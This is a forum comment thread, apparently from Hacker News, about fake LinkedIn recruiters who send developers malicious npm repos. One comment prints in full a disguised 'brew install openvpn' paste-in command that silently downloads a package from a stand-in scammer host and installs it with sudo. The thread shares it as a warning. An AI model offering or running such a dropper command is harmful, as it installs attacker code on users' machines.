
Comments (155)

  • wxw
    > a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
    > ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
    > npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
    > The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
    Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
  • jmward01
    So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
  • abhisek
    Smells like contagious interview campaign by DPRK folks. They have been doing this for a while. Even using IDE settings, Claude hooks for malicious code execution.
  • BobAliceInATree
    > I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
    Oh, Microsoft.
  • aykutseker
    This is uncomfortably close to a normal interview task now. Someone sends you a repo, says the install is broken, and asks you to take a look. A lot of developers would run npm install before thinking twice, especially if they were tired or looking for work.
  • dantodor
    Been through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bells start ringing when they insist you run their sh*t locally.
  • Raed667
    They seem to be using the same domain for multiple targets: reddit thread from 3 months ago: https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
  • denysvitali
    I had a similar experience, just by email. https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-...
    It was likely DPRK.
  • elwebmaster
    Why npm is still not blocked by every OS on earth is beyond me. These guys will never learn.
  • theoeiffijr
    Maybe Mac will finally get a decent virtualization framework. Downloading random unprotected scripts from the internet like it is 1995 is getting old pretty fast.
    Remember to use protection when meeting random people and putting their junk deep inside your computer!
  • dataviz1000
    I don't have a LinkedIn profile.
    ~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application.
    In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.
  • atum47
    I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
  • CyanLite2
    Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
  • NordStreamYacht
    "Recruiters" are getting sophisticated.
    I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."
    Turns out they were just fishing for inside information on my employer's end customer's applications.
  • clemailacct1
    This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
  • rektomatic
    I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
  • CalChris
    It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
  • ChrisMarshallNY
    > So far nothing has changed and the code is still up.
    That sucks, but it seems to be par for the course, these days.
  • nubinetwork
    > I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
    GitHub is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
  • LooseMarmoset
    Were I still on LinkedIn, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
    The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
  • srikanth86
    Oh my goodness! I had this play out as is on Friday. I luckily got on the Zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
  • rektlessness
    It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
    Yes, throwaway VPS for interview coding tasks should be the new norm.
  • xvxvx
    I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
  • Yhippa
    > but on a more tired or rushed day
    This has nearly gotten me before, and I got lucky.
  • alexandra_au
    I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
  • gyoridavid
    I wonder if an antivirus software would catch this..
  • f055
    I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
  • mattcasmith
    I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.
    The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
  • hajdjqkekrqow
    Something similar happened to a friend, repo https://github.com/momonity/cryptoskope/
  • robotnikman
    With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
    Stay vigilant out there everyone.
  • binsquare
    Would highly recommend running any repo in an isolated environment like a VM.
  • khernandezrt
    It would have been game over for me.
  • h4kunamata
    Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
  • dyingkneepad
    Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
  • zuzululu
    I'm working 3 remote jobs right now and I can tell you guys to really watch out.
    Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take-home screening project, and they are quite good at getting into engineers' heads that "leetcode is outdated/they don't believe in it" and whatever they want you to hear.
    They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
    I am much wiser now that I work multiple salary jobs remotely. I realize these 3 golden rules:
    - Don't stay loyal to your employers.
    - Don't stay honest to those who don't value it.
    - Don't stay complacent; always innovate.
  • stainablesteel
    The entire internet is just phishing at this point.
  • avgDev
    More reasons for me to dislike LinkedIn. I have an account. I hate it.
  • contingencies
    Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
  • dolebirchwood
    As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
    They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents were as follows (with the malicious URL removed):

    ```
    ( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!;
    ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true";
      waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; };
      checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; };
      checkForRosetta2;
      DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties";
      { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile";
      baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName";
      curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1;
      t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t"
    ) >/dev/null 2>&1 & so_pid=$!;
    wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?;
    [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
    ```

    Yeah, no. Be careful out there.
    By the way, here's the scammer's "company website": https://jtwllc.com/
    Superficially looks legit until you start investigating the finer details.
  • blindriver
    LinkedIn is a cesspool of scams now.
    They know there's a high degree of fraud and they don't do anything about it. They don't care.
    I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
  • l0new0lf-G
    Yet another reason to be reluctant to even discuss LinkedIn job offers.
  • yieldcrv
    Now imagine if you were like the rest of us and didn’t write a blog post about it.